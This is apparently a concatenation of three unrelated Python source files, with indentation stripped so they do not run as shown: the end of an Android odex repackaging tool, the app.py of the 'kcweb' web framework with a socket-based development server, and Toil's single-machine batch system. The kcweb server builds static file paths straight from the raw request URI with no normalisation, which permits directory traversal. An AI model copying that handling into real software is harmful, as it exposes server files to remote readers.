shutil.move(os.path.join(dexFolder, dexFile), os.path.join(dexFolder, dexName))
Utils.runWithOutput(["jar", "cf", jarFile, dexName])
os.remove(os.path.join(dexFolder, dexName))
continue
Log.d(TAG, "Repackage %s" %(jarFile))
if not OatZip.isDeodexed(jarFile):
# Put the dex and framework's jar in the same folder, and jar into the jarFile
dexName = "classes.dex"
shutil.move(os.path.join(dexFolder, dexFile), os.path.join(dexFolder, dexName))
Utils.runWithOutput(["jar", "uf", jarFile, dexName])
os.remove(os.path.join(dexFolder, dexName))
dexName = "classes2.dex"
dexFile = appName + "-" + dexName
if os.path.exists(os.path.join(dexFolder, dexFile)):
shutil.move(os.path.join(dexFolder, dexFile), os.path.join(dexFolder, dexName))
Utils.runWithOutput(["jar", "uf", jarFile, dexName])
os.remove(os.path.join(dexFolder, dexName))
dexName = "classes3.dex"
dexFile = appName + "-" + dexName
if os.path.exists(os.path.join(dexFolder, dexFile)):
shutil.move(os.path.join(dexFolder, dexFile), os.path.join(dexFolder, dexName))
Utils.runWithOutput(["jar", "uf", jarFile, dexName])
os.remove(os.path.join(dexFolder, dexName))
os.chdir(oldDir)
@staticmethod
def repackageAppWithArch(appDir, arch):
""" Repackage the classes.dex into apk of appDir
"""
if OPTIONS.formatApp == False: return
# Keep the old directory, we will change back after some operations.
oldDir = os.path.abspath(os.curdir)
Log.i(TAG, "Repackage APKs of %s" %(appDir))
for app in os.listdir(appDir):
apkPath = os.path.join(appDir, app)
apkFile = os.path.join(apkPath, app + ".apk")
archPath = os.path.join(apkPath, "oat", arch)
dexFile = os.path.join(archPath, app + ".dex")
if os.path.exists(archPath):
if not OatZip.isDeodexed(apkFile):
OatZip.packageDexToAppWithArch(apkFile, arch)
#rm -rf $appdir/$app/$arch
shutil.rmtree(archPath)
os.chdir(oldDir)
@staticmethod
def check_validate(apkFile, arch, arch2):
'''check whether is validate apk'''
return True
@staticmethod
def dealWithAdditionalApks(systemDir, frwDir, arch, arch2, allAppDirs):
''' deal with additional apks '''
if OPTIONS.formatApp == False: return
# Keep the old directory, we will change back after some operations.
oldDir = os.path.abspath(os.curdir)
bootClassFolderArch = os.path.join(frwDir, arch, "odex")
bootClassFolderArch2 = os.path.join(frwDir, arch2, "odex")
for (dirpath, dirnames, filenames) in os.walk(systemDir):
# Exclude scanned directories
if dirpath in allAppDirs:
continue
dirnames = dirnames # no use, to avoid warning
for filename in filenames:
if filename.endswith(".apk") or filename.endswith(".jar"):
apkFile = os.path.join(dirpath, filename)
if not OatZip.check_validate(apkFile, arch, arch2):
continue
archDir = os.path.join(dirpath, "oat", arch)
#app name
app = filename[0:-4]
if os.path.exists(archDir):
if not OatZip.isDeodexed(apkFile):
odexFile = os.path.join(archDir, app + ".odex")
if os.path.exists(odexFile):
Utils.runWithOutput([OatZip.OAT2DEX, odexFile, bootClassFolderArch])
OatZip.packageDexToAppWithArch(apkFile, arch)
#rm -rf $appdir/$app/$arch
shutil.rmtree(archDir)
arch2Dir = os.path.join(dirpath, "oat", arch2)
if os.path.exists(arch2Dir):
if not OatZip.isDeodexed(apkFile):
odexFile = os.path.join(arch2Dir, app + ".odex")
if os.path.exists(odexFile):
Utils.runWithOutput([OatZip.OAT2DEX, odexFile, bootClassFolderArch2])
OatZip.packageDexToAppWithArch(apkFile, arch2)
#rm -rf $appdir/$app/$arch
shutil.rmtree(arch2Dir)
if os.path.exists(os.path.join(dirpath, "oat")) :
shutil.rmtree(os.path.join(dirpath, "oat"))
def debug():
Log.DEBUG = True
root = "root directory the unziped files"
OatZip(root).deoat()
OatZip(root).rebuild()
if __name__ == "__main__":
debug()
|
app.py
|
# -*- coding: utf-8 -*-
import socket,time,re,os,sys,traceback,threading,urllib
from . Events import Events
from . common import *
from . import config
from mako.template import Template
from datetime import datetime
from threading import local
from .utill import filetype
from kcweb.utill.cache import cache as kcwcache
class web:
__name=None
__appname=None
__config=config
def __new__(self,name,appname=None):
self.__name=name
self.__appname=appname
if self.__name != '__main__':
def apps(env, start_response):
# REQUEST_METHOD=env['REQUEST_METHOD'] #GET
# QUERY_STRING=env['QUERY_STRING'] #a=1&b=1
# RAW_URI=env['RAW_URI'] #/aa/bb/cc?a=1&b=1
# SERVER_PROTOCOL=env['SERVER_PROTOCOL'] #HTTP/1.1
# HTTP_HOST=env['HTTP_HOST'] #212.129.149.238:39010
# HTTP_COOKIE=env['HTTP_COOKIE'] #cookie
# REMOTE_ADDR=env['REMOTE_ADDR'] #27.156.27.201
# PATH_INFO=env['PATH_INFO'] #/aa/bb/cc
# HTTP_USER_AGENT=env['HTTP_USER_AGENT'] #Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0
try:
env['BODY_DATA']=str(env['wsgi.input'].next(), encoding = "utf-8")
except:
env['BODY_DATA']=""
p=(config.app['staticpath']+env['RAW_URI'].replace(' ',''))
status='200 ok'
if os.path.isfile(p):
kind = filetype.guess(p)
if kind is None:
f=open(p,"rb")
body=f.read()
f.close()
resheader=[
("Cache-Control","public, max-age=43200"),
]
else:
f=open(p,"rb")
body=f.read()
f.close()
resheader=[
("Content-Type",kind.mime),
("Cache-Control","public, max-age=43200"),
("Accept-Ranges","bytes"),
# ("Content-Length",len(body))
]
else:
status,resheader,body=self.__routes(self,env)
body=bytes(body, encoding='utf-8')
# print(env['bodydata'])
# print("\n\nwsgi.input",env['wsgi.input'])
# print("\n\ndir(env['wsgi.input'])",dir(env['wsgi.input']))
# print("\n\nenv['wsgi.input'].__dict__",env['wsgi.input'].__dict__)
# try:
# print("\n\nwsgi.input.buf()",env['wsgi.input'].buf())
# except Exception as e:
# print("\n\nwsgi.input.buf() error:",e)
# try:
# print("\n\nwsgi.input.next()",env['wsgi.input'].next())
# except Exception as e:
# print("\n\nwsgi.input.next() error:",e)
# try:
# print("\n\nwsgi.input.read()",env['wsgi.input'].read())
# except Exception as e:
# print("\n\nwsgi.input.read() error:",e)
# try:
# print("\n\nwsgi.input.reader()",env['wsgi.input'].reader())
# except Exception as e:
# print("\n\nwsgi.input.reader() error:",e)
# try:
# print("\n\nwsgi.input.readline()",env['wsgi.input'].readline())
# except Exception as e:
# print("\n\nwsgi.input.readline() error:",e)
# try:
# print("\n\nwsgi.input.readlines()",env['wsgi.input'].readlines())
# except Exception as e:
# print("\n\nwsgi.input.readlines() error:",e)
# try:
# print("wsgi.input.aa",env['wsgi.input'].get("SCRIPT_NAME", ""))
# except Exception as e:
# print("wsgi.input.get('aa') error:",e)
# try:
# print("wsgi.input.aa",env['wsgi.input']['aa'])
# except Exception as e:
# print("wsgi.input['aa'] error:",e)
# print(dir(env['wsgi.input']).getsize)
# from io import StringIO
# stdout = StringIO()
# print("Hello world!", file=stdout)
# print(file=stdout)
# h = sorted(env.items())
# for k,v in h:
# print(k,'=',repr(v), file=stdout)
# print(stdout.getvalue().encode("utf-8"))
start_response(status,resheader)
return [body]
return apps
else:
return super().__new__(self)
def run(self,filename,host="127.0.0.1",port="39001",name='python3'):
"""运行开发环境
filename: 命令行脚本名称
host: 监听地址
port: 端口
name: python命令行解释机名字 默认python3
"""
if self.__config.app['app_debug']:
arg=sys.argv
if len(arg)==2 and arg[1]=='eventlog':
self.__impl(host=host,port=port,filename=filename)
else:
Events([name,str(filename)+'.py','eventlog'])
else:
self.__impl(
host=host,
port=port,
filename=filename
)
def __impl(self,host,port,filename):
"运行测试服务器"
try:
self.__http_server(
host=host,
port=port,
filename=filename
)
except KeyboardInterrupt:
pass
def __get_modular(self,header):
"获取模块"
modular=''
route=self.__config.route
if route['modular']:
if isinstance(route['modular'],str):
modular=route['modular']
else:
HTTP_HOST=header['HTTP_HOST'].split(".")[0]
for mk in route['modular']:
if HTTP_HOST in mk:
modular=mk[HTTP_HOST]
return modular
def __getconfigroute(self,PATH_INFO,header):
"使用配置路由"
route=self.__config.route
routedefault=route['default']
methods=route['methods']
paths=''
for path in PATH_INFO:
paths+="/"+path
try:
for item in route['children']:
if ':' in item['path']:
path=item['path'].split(':')
if(len(path)==len(PATH_INFO)):
is_pp=False
try:
item['methods']
except:pass
else:
methods=item['methods']
for k in methods: #匹配请求方式
if header['REQUEST_METHOD'] in k:
is_pp=True
break
if path[0]==paths[:len(path[0])] and is_pp:
del PATH_INFO[0]
cs=PATH_INFO
PATH_INFO=item['component'].split('/')
for v in cs:
PATH_INFO.append(v)
routedefault=True
break
elif item['path']==paths or item['path']+'/'==paths:
PATH_INFO=item['component'].split('/')
routedefault=True
break
except:pass
return routedefault,PATH_INFO
def defaultroute(self,header,PATH_INFO):
"路由匹配"
route=self.__config.route
modular=web.__get_modular(self,header)
routedefault=route['default']
methods=route['methods']
if routedefault:
edition='index'
files=route['files']
funct=route['funct']
else:
edition=''
files=''
funct=''
param=[]
urls=''
i=0
HTTP_HOST=header['HTTP_HOST'].split(".")[0]
##默认路由start #################################################################################
if modular:
if route['edition']: #匹配模块并且匹配了版本
edition=route['edition']
routedefault,PATH_INFO=web.__getconfigroute(
self,
PATH_INFO,
header
)
if routedefault: #使用路由
for path in PATH_INFO:
if path:
if i==0:
files=path
urls=urls+"/"+str(path)
elif i==1:
funct=path
urls=urls+"/"+str(path)
else:
param.append(urllib.parse.unquote(path))
i+=1
else: #配置模块没有配置版本
routedefault,PATH_INFO=web.__getconfigroute(
self,
PATH_INFO,
header
)
if routedefault: #使用默认路由
for path in PATH_INFO:
if path:
if i==0:
edition=path
elif i==1:
files=path
urls=urls+"/"+str(path)
elif i==2:
funct=path
urls=urls+"/"+str(path)
else:
param.append(urllib.parse.unquote(path))
i+=1
elif route['edition']: #配置版本的但没有匹配模块
edition=route['edition']
routedefault,PATH_INFO=web.__getconfigroute(
self,
PATH_INFO,
header
)
if routedefault: #使用默认路由
for path in PATH_INFO:
if path:
if i==0:
modular=path
elif i==1:
files=path
urls=urls+"/"+str(path)
elif i==2:
funct=path
urls=urls+"/"+str(path)
else:
param.append(urllib.parse.unquote(path))
i+=1
else: #完全默认
routedefault,PATH_INFO=web.__getconfigroute(self,PATH_INFO,header)
for path in PATH_INFO:
if path:
if i==0:
modular=path
elif i==1:
edition=path
elif i==2:
files=path
urls=urls+"/"+str(path)
elif i==3:
funct=path
urls=urls+"/"+str(path)
else:
param.append(urllib.parse.unquote(path))
i+=1
#默认路由end ############################################################
return methods,modular,edition,files,funct,tuple(param)
def __tran(self,data,status,resheader):
"转换控制器返回的内容"
if isinstance(data,tuple):
i=0
for item in data:
if i==0:
body=item
elif i==1:
status=item
elif i==2:
if isinstance(item,dict):
for key in item:
resheader[key]=item[key]
else:
raise Exception('错误!这个不是一个字典')
else:
break
i+=1
else:
body=data
return body,status,resheader
def __set_globals(self,header):
globals.HEADER.Method=header['REQUEST_METHOD']
globals.HEADER.URL=header['RAW_URI']
globals.HEADER.PATH_INFO=header['PATH_INFO']
globals.HEADER.QUERY_STRING=header['QUERY_STRING']
globals.HEADER.SERVER_PROTOCOL=header['SERVER_PROTOCOL']
globals.HEADER.HTTP_HOST=header['HTTP_HOST']
globals.HEADER.BODY_DATA=header['BODY_DATA']
try:
globals.HEADER.HTTP_COOKIE=header['HTTP_COOKIE']
except:
globals.HEADER.HTTP_COOKIE=None
globals.HEADER.HTTP_USER_AGENT=header['HTTP_USER_AGENT']
def __del_globals():
globals.VAR = local()
globals.HEADER = local()
globals.G = local()
def __routes(self,header):
body="这是一个http测试服务器"
status="200 ok"
resheader={"Content-Type":"text/html; charset=utf-8"}
web.__set_globals(self,header)
PATH_INFO=header['PATH_INFO'].split('/')
del PATH_INFO[0]
methods,modular,edition,files,funct,param=web.defaultroute(self,header,PATH_INFO)
if header['REQUEST_METHOD'] in methods:
try:
obj=getattr(web.__appname,modular)
except (AttributeError,UnboundLocalError):
status="500 Internal Server Error"
body=web.__tpl(
title = status,
e=status,
data="无法找到目录:"+str(modular)+"/"
)
else:
try:
obj=getattr(obj,"controller")
except (AttributeError,UnboundLocalError):
status="404 Not Found"
body=web.__tpl(
title = status,
e=status,
data="无法找到目录:"+str(modular)+"/controller/"
)
else:
try:
obj=getattr(obj,edition)
except (AttributeError,UnboundLocalError) as e:
con="无法找到目录:"+str(modular)+"/controller/"+str(edition)+"/"
try:
data=getattr(obj,"error")(e,con)
body,status,resheader=web.__tran(
self,
data,
status,
resheader
)
except (AttributeError,UnboundLocalError):
status="404 Not Found"
body=web.__tpl(
title = status,
e=status,data=con
)
except Exception as e:
status="500 Internal Server Error"
errms=status
if self.__config.app['app_debug']:
print(traceback.format_exc())
errms=traceback.format_exc().split("\n")
body=web.__tpl(
title = status,
data=errms,e=e
)
else:
try:
obj=getattr(obj,files)
except (AttributeError,UnboundLocalError) as e:
con="无法找到文件:"+str(modular)+"/controller/"+str(edition)+"/"+str(files)+".py"
try:
data=getattr(obj,"error")(e,con)
body,status,resheader=web.__tran(
self
,data
,status
,resheader
)
except (AttributeError,UnboundLocalError):
status="404 Not Found"
body=web.__tpl(
title = status
,data=con
,e=status)
except Exception as e:
status="500 Internal Server Error"
errms=status
if self.__config.app['app_debug']:
print(traceback.format_exc())
errms=traceback.format_exc().split("\n")
body=web.__tpl(
title = status,
data=errms,
e=e
)
else:
try:
data=None
if self.__config.app['before_request']: #请求前执行的函数
try:
data=getattr(obj,self.__config.app['before_request'])()
if data:
body,status,resheader=web.__tran(
self,data,
status,
resheader
)
except (AttributeError):
print(traceback.format_exc())
pass
except Exception as e:
try:
data=getattr(obj,"error")(e,traceback.format_exc().split("\n"))
body,status,resheader=web.__tran(
self,data,
status,
resheader
)
except (AttributeError):
data=True
status="500 Internal Server Error"
errms=status
if self.__config.app['app_debug']:
# print(traceback.format_exc())
errms=traceback.format_exc().split("\n")
body=web.__tpl(
title = status,
data=errms,e=e
)
except Exception as e:
data=True
status="500 Internal Server Error"
errms=status
if self.__config.app['app_debug']:
print(traceback.format_exc())
errms=traceback.format_exc().split("\n")
body=web.__tpl(
title = status,
data=errms,e=e
)
if not data:
data=getattr(obj,funct)(*param)
body,status,resheader=web.__tran(
self,data,
status,
resheader
)
except Exception as e:
try:
data=getattr(obj,"error")(e,traceback.format_exc().split("\n"))
body,status,resheader=web.__tran(
self,data,
status,
resheader
)
except (AttributeError):
status="500 Internal Server Error"
errms=status
if self.__config.app['app_debug']:
print(traceback.format_exc())
errms=traceback.format_exc().split("\n")
body=web.__tpl(
title = status,
data=errms,
e=e
)
except Exception as e:
status="500 Internal Server Error"
errms=status
if self.__config.app['app_debug']:
print(traceback.format_exc())
errms=traceback.format_exc().split("\n")
body=web.__tpl(
title = status,
data=errms,
e=e
)
else:
status="405 Method Not Allowed"
body=web.__tpl(
title = status,
data='405 Method Not Allowed',
e=''
)
try:
resheader['set-cookie']=globals.set_cookie
del globals.set_cookie
except:pass
if self.__config.app['after_request']: #请求后执行的函数
try:
data=getattr(obj,self.__config.app['after_request'])()
if data:
body,status,resheader=web.__tran(self,data,status,resheader)
except (AttributeError,UnboundLocalError):pass
except Exception as e:
try:
data=getattr(obj,"error")(e,traceback.format_exc().split("\n"))
body,status,resheader=web.__tran(
self,data,
status,
resheader
)
except AttributeError as e:
status="500 Internal Server Error"
errms=status
if self.__config.app['app_debug']:
print(traceback.format_exc())
errms=traceback.format_exc().split("\n")
body=web.__tpl(
title = status
,data=errms,
e=e
)
except Exception as e:
status="500 Internal Server Error"
errms=status
if self.__config.app['app_debug']:
print(traceback.format_exc())
errms=traceback.format_exc().split("\n")
body=web.__tpl(
title = status,
data=errms,
e=""
)
resheaders=[]
for key in resheader:
resheaders.append((key,resheader[key]))
web.__del_globals()
if isinstance(resheaders,list):
if not body:
body=''
return str(status),resheaders,str(body)
else:
raise Exception()
def __tpl(**context):
path=os.path.split(os.path.realpath(__file__))[0]
body=''
with open(path+'/tpl/error.html', 'r',encoding='utf-8') as f:
content=f.read()
t=Template(content)
body=t.render(**context)
return body
def __http_server(self,host,port,filename):
tcp_socket=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
tcp_socket.bind((host,int(port)))
except OSError:
print("通常每个套接字地址(协议/网络地址/端口)只允许使用一次(按CTRL+C退出)")
else:
tcp_socket.listen(1024)
print('! 警告:这是开发服务器。不要在生产环境中部署使用它')
print('* 生产环境中建议使用gunicorn,gunicorn运行命令如:gunicorn -b '+host+':'+str(port)+' '+str(filename)+':app')
if self.__config.app['app_debug']:
print('* 调试器:开启')
else:
print('* 调试器:已关闭')
print("* 运行在http://"+host+":"+str(port)+"/ (按CTRL+C退出)")
while True:
new_tcp_socket,client_info=tcp_socket.accept()
t=threading.Thread(target=self.__server_client,args=(new_tcp_socket,))
t.daemon=True
t.start()
tcp_socket.close()
def __server_client(self,new_socket):
# 处理http的的请求
data=new_socket.recv(1047576).decode()
if data:
datas=data.split("\r\n")
data1=datas[0]
#reqsest
REQUEST_METHOD=data1.split("/")[0].replace(' ','') ##GET
RAW_URI=re.findall(REQUEST_METHOD+"(.+?) HTTP", data1) #/aa/bb/cc?a=1&b=1
if RAW_URI:
RAW_URI=RAW_URI[0]
else:
RAW_URI=''
PATH_INFO=RAW_URI.split("?")[0] #/aa/bb/cc
QUERY_STRING=RAW_URI.replace(str(PATH_INFO),'').replace('?','') #a=1&b=1
SERVER_PROTOCOL=data1.split(" ")[-1] #HTTP/1.1
HTTP_HOST=re.findall("Host: (.+?)\r\n", data)#212.129.149.238:39010
if HTTP_HOST:
HTTP_HOST=HTTP_HOST[0]
else:
HTTP_HOST=''
HTTP_COOKIE=re.findall("Cookie: (.+?)\r\n", data)#cookie
if HTTP_COOKIE:
HTTP_COOKIE=HTTP_COOKIE[0]
else:
HTTP_COOKIE=''
REMOTE_ADDR=''
HTTP_USER_AGENT=re.findall("User-Agent: (.+?)\r\n", data) #Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0
if HTTP_USER_AGENT:
HTTP_USER_AGENT=HTTP_USER_AGENT[0]
else:
HTTP_USER_AGENT=''
BODY_DATA=datas[len(datas)-1]
# print(data)
#reqsest
reqheader={
'REQUEST_METHOD':REQUEST_METHOD,
'RAW_URI':RAW_URI,
'PATH_INFO':PATH_INFO,
'QUERY_STRING':QUERY_STRING,
'SERVER_PROTOCOL':SERVER_PROTOCOL,
'HTTP_HOST':HTTP_HOST,
'HTTP_COOKIE':HTTP_COOKIE,
'REMOTE_ADDR':REMOTE_ADDR,
'HTTP_USER_AGENT':HTTP_USER_AGENT,
'BODY_DATA':BODY_DATA
}
# print(BODY_DATA)
p=(config.app['staticpath']+RAW_URI.replace(' ',''))
# print("目录",p)
status='200 ok'
if os.path.isfile(p):
# print('静态文件',p)
kind = filetype.guess(p)
if kind is None:
f=open(p,"rb")
body=f.read()
f.close()
resheader=[("Cache-Control","public, max-age=43200"),("Expires","Thu, 07 Nov 2019 02:59:02 GMT")]
header="HTTP/1.1 %s \n" % status
header+="Content-Length:%d\n" % len(body)
else:
f=open(p,"rb")
body=f.read()
f.close()
resheader=[("Content-Type",kind.mime),("Cache-Control","public, max-age=43200"),("Accept-Ranges","bytes"),("Expires","Thu, 07 Nov 2019 02:59:02 GMT")]
header="HTTP/1.1 %s \n" % status
header+="Content-Length:%d\n" % len(body)
else:
status,resheader,body=self.__routes(reqheader)
body=body.encode()
header="HTTP/1.1 %s \n" % status
header+="Content-Length:%d\n" % len(body)
print(HTTP_HOST+' -- ['+str(time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()))+'] "'+REQUEST_METHOD+" "+RAW_URI +" "+SERVER_PROTOCOL + '" '+status+"-")
t=time.time()
header+="Server:kcweb\n"
header+="Date:%s\n" % datetime.utcnow().strftime('%a, %d %b %Y %H:%M:%S GMT')
for t in resheader:
header+="%s:%s\n" % (t[0],t[1])
header+="\n"
try:
new_socket.send(header.encode())
new_socket.send(body)
except Exception as e:
pass
new_socket.close()
def __http_sever(self,host,port):
#http测试服务器
if self.__config.app['app_debug']:
print('* 调试器:开启')
else:
print('* 调试器:已关闭')
print("* 运行在http://"+host+":"+str(port)+"/ (按CTRL+C退出)")
tcp_socket=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
tcp_socket.bind((host,int(port)))
tcp_socket.listen(1024)
pack_length=1024
tcp_socket.setblocking(False)
tcp_socket_list=list()
while True:
try:
new_tcp_socket,client_info=tcp_socket.accept()
except:
pass
else:
new_tcp_socket.setblocking(False)
tcp_socket_list.append(new_tcp_socket)
for cli_soc in tcp_socket_list:
try:
data=cli_soc.recv(pack_length).decode()
except Exception as e:
pass
else:
if data:
datas=data.split("\r\n")
data1=datas[0]
#reqsest
REQUEST_METHOD=data1.split("/")[0].replace(' ','') ##GET
RAW_URI=re.findall(REQUEST_METHOD+"(.+?) HTTP", data1) #/aa/bb/cc?a=1&b=1
if RAW_URI:
RAW_URI=RAW_URI[0]
else:
RAW_URI=''
PATH_INFO=RAW_URI.split("?")[0] #/aa/bb/cc
QUERY_STRING=RAW_URI.replace(str(PATH_INFO),'').replace('?','') #a=1&b=1
SERVER_PROTOCOL=data1.split(" ")[-1] #HTTP/1.1
HTTP_HOST=re.findall("Host: (.+?)\r\n", data)#212.129.149.238:39010
if HTTP_HOST:
HTTP_HOST=HTTP_HOST[0]
else:
HTTP_HOST=''
HTTP_COOKIE=re.findall("Cookie: (.+?)\r\n", data)#cookie
if HTTP_COOKIE:
HTTP_COOKIE=HTTP_COOKIE[0]
else:
HTTP_COOKIE=''
REMOTE_ADDR=''
HTTP_USER_AGENT=re.findall("User-Agent: (.+?)\r\n", data) #Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0
if HTTP_USER_AGENT:
HTTP_USER_AGENT=HTTP_USER_AGENT[0]
else:
HTTP_USER_AGENT=''
BODY_DATA=datas[len(datas)-1]
#reqsest
reqheader={
'REQUEST_METHOD':REQUEST_METHOD,
'RAW_URI':RAW_URI,
'PATH_INFO':PATH_INFO,
'QUERY_STRING':QUERY_STRING,
'SERVER_PROTOCOL':SERVER_PROTOCOL,
'HTTP_HOST':HTTP_HOST,
'HTTP_COOKIE':HTTP_COOKIE,
'REMOTE_ADDR':REMOTE_ADDR,
'HTTP_USER_AGENT':HTTP_USER_AGENT,
'BODY_DATA':BODY_DATA
}
p=(config.app['staticpath']+RAW_URI.replace(' ',''))
status='200 ok'
if os.path.isfile(p):
kind = filetype.guess(p)
if kind is None:
f=open(p,"rb")
body=f.read()
f.close()
resheader=[("Cache-Control","public, max-age=43200"),("Expires","Thu, 07 Nov 2019 02:59:02 GMT")]
header="HTTP/1.1 %s \n" % status
header+="Content-Length:%d\n" % len(body)
else:
f=open(p,"rb")
body=f.read()
f.close()
resheader=[("Content-Type",kind.mime),("Cache-Control","public, max-age=43200"),("Accept-Ranges","bytes"),("Expires","Thu, 07 Nov 2019 02:59:02 GMT")]
header="HTTP/1.1 %s \n" % status
header+="Content-Length:%d\n" % len(body)
else:
status,resheader,body=self.__routes(reqheader)
body=body.encode()
header="HTTP/1.1 %s \n" % status
header+="Content-Length:%d\n" % len(body)
print(HTTP_HOST+' -- ['+str(time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()))+'] "'+REQUEST_METHOD+" "+RAW_URI +" "+SERVER_PROTOCOL + '" '+status+"-")
t=time.time()
header+="Server:kcweb\n"
header+="Date:%s\n" % datetime.utcnow().strftime('%a, %d %b %Y %H:%M:%S GMT')
for t in resheader:
header+="%s:%s\n" % (t[0],t[1])
header+="\n"
try:
cli_soc.send(header.encode())
cli_soc.send(body)
except Exception as e:
cli_soc.close()
else:
cli_soc.close()
tcp_socket_list.remove(cli_soc)
tcp_socket.close()
|
singleMachine.py
|
# Copyright (C) 2015-2016 Regents of the University of California
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from future import standard_library
standard_library.install_aliases()
from builtins import str
from builtins import range
from builtins import object
from past.utils import old_div
from contextlib import contextmanager
import logging
import multiprocessing
import os
import time
import math
from threading import Thread
from threading import Lock, Condition
from six.moves.queue import Empty, Queue
import toil
from toil import subprocess
from toil.batchSystems.abstractBatchSystem import BatchSystemSupport
from toil import worker as toil_worker
from toil.common import Toil
log = logging.getLogger(__name__)
class SingleMachineBatchSystem(BatchSystemSupport):
"""
The interface for running jobs on a single machine, runs all the jobs you give it as they
come in, but in parallel.
"""
@classmethod
def supportsAutoDeployment(cls):
return False
@classmethod
def supportsWorkerCleanup(cls):
return True
numCores = multiprocessing.cpu_count()
minCores = 0.1
"""
The minimal fractional CPU. Tasks with a smaller core requirement will be rounded up to this
value. One important invariant of this class is that each worker thread represents a CPU
requirement of minCores, meaning that we can never run more than numCores / minCores jobs
concurrently.
"""
physicalMemory = toil.physicalMemory()
def __init__(self, config, maxCores, maxMemory, maxDisk):
if maxCores > self.numCores:
log.warning('Limiting maxCores to CPU count of system (%i).', self.numCores)
maxCores = self.numCores
if maxMemory > self.physicalMemory:
log.warning('Limiting maxMemory to physically available memory (%i).', self.physicalMemory)
maxMemory = self.physicalMemory
self.physicalDisk = toil.physicalDisk(config)
if maxDisk > self.physicalDisk:
log.warning('Limiting maxDisk to physically available disk (%i).', self.physicalDisk)
maxDisk = self.physicalDisk
super(SingleMachineBatchSystem, self).__init__(config, maxCores, maxMemory, maxDisk)
assert self.maxCores >= self.minCores
assert self.maxMemory >= 1
# The scale allows the user to apply a factor to each task's cores requirement, thereby
# squeezing more tasks onto each core (scale < 1) or stretching tasks over more cores
# (scale > 1).
self.scale = config.scale
if config.badWorker > 0 and config.debugWorker:
# We can't throw SIGUSR1 at the worker because it is also going to
# be the leader and/or test harness.
raise RuntimeError("Cannot use badWorker and debugWorker together; "
"worker would have to kill the leader")
self.debugWorker = config.debugWorker
# Number of worker threads that will be started
self.numWorkers = int(old_div(self.maxCores, self.minCores))
# A counter to generate job IDs and a lock to guard it
self.jobIndex = 0
self.jobIndexLock = Lock()
# A dictionary mapping IDs of submitted jobs to the command line
self.jobs = {}
"""
:type: dict[str,toil.job.JobNode]
"""
# A queue of jobs waiting to be executed. Consumed by the workers.
self.inputQueue = Queue()
# A queue of finished jobs. Produced by the workers.
self.outputQueue = Queue()
# A dictionary mapping IDs of currently running jobs to their Info objects
self.runningJobs = {}
"""
:type: dict[str,Info]
"""
# The list of worker threads
self.workerThreads = []
"""
:type list[Thread]
"""
# Variables involved with non-blocking resource acquisition
self.acquisitionTimeout = 5
self.acquisitionRetryDelay = 10
self.aquisitionCondition = Condition()
# A pool representing available CPU in units of minCores
self.coreFractions = ResourcePool(self.numWorkers, 'cores', self.acquisitionTimeout)
# A lock to work around the lack of thread-safety in Python's subprocess module
self.popenLock = Lock()
# A pool representing available memory in bytes
self.memory = ResourcePool(self.maxMemory, 'memory', self.acquisitionTimeout)
# A pool representing the available space in bytes
self.disk = ResourcePool(self.maxDisk, 'disk', self.acquisitionTimeout)
if not self.debugWorker:
log.debug('Setting up the thread pool with %i workers, '
'given a minimum CPU fraction of %f '
'and a maximum CPU value of %i.', self.numWorkers, self.minCores, maxCores)
for i in range(self.numWorkers):
worker = Thread(target=self.worker, args=(self.inputQueue,))
self.workerThreads.append(worker)
worker.start()
else:
log.debug('Started in worker debug mode.')
def _runWorker(self, jobCommand, jobID, environment):
"""
Run the jobCommand using the worker and wait for it to finish.
The worker is forked unless it is a '_toil_worker' job and
debugWorker is True.
"""
startTime = time.time() # Time job is started
if self.debugWorker and "_toil_worker" in jobCommand:
# Run the worker without forking
jobName, jobStoreLocator, jobStoreID = jobCommand.split()[1:] # Parse command
jobStore = Toil.resumeJobStore(jobStoreLocator)
# TODO: The following does not yet properly populate self.runningJobs so it is not possible to kill
# running jobs in forkless mode - see the "None" value in place of popen
info = Info(time.time(), None, killIntended=False)
try:
self.runningJobs[jobID] = info
try:
toil_worker.workerScript(jobStore, jobStore.config, jobName, jobStoreID,
redirectOutputToLogFile=not self.debugWorker) # Call the worker
finally:
self.runningJobs.pop(jobID)
finally:
if not info.killIntended:
self.outputQueue.put((jobID, 0, time.time() - startTime))
else:
with self.popenLock:
popen = subprocess.Popen(jobCommand,
shell=True,
env=dict(os.environ, **environment))
info = Info(time.time(), popen, killIntended=False)
try:
self.runningJobs[jobID] = info
try:
statusCode = popen.wait()
if statusCode != 0 and not info.killIntended:
log.error("Got exit code %i (indicating failure) "
"from job %s.", statusCode, self.jobs[jobID])
finally:
self.runningJobs.pop(jobID)
finally:
if not info.killIntended:
self.outputQueue.put((jobID, statusCode, time.time() - startTime))
# Note: The input queue is passed as an argument because the corresponding attribute is reset
# to None in shutdown()
def worker(self, inputQueue):
while True:
if self.debugWorker and inputQueue.empty():
return
args = inputQueue.get()
if args is None:
break
jobCommand, jobID, jobCores, jobMemory, jobDisk, environment = args
while True:
try:
coreFractions = int(old_div(jobCores, self.minCores))
log.debug('Acquiring %i bytes of memory from a pool of %s.', jobMemory,
self.memory)
with self.memory.acquisitionOf(jobMemory):
log.debug('Acquiring %i fractional cores from a pool of %s to satisfy a '
'request of %f cores', coreFractions, self.coreFractions,
jobCores)
with self.coreFractions.acquisitionOf(coreFractions):
with self.disk.acquisitionOf(jobDisk):
self._runWorker(jobCommand, jobID, environment)
except ResourcePool.AcquisitionTimeoutException as e:
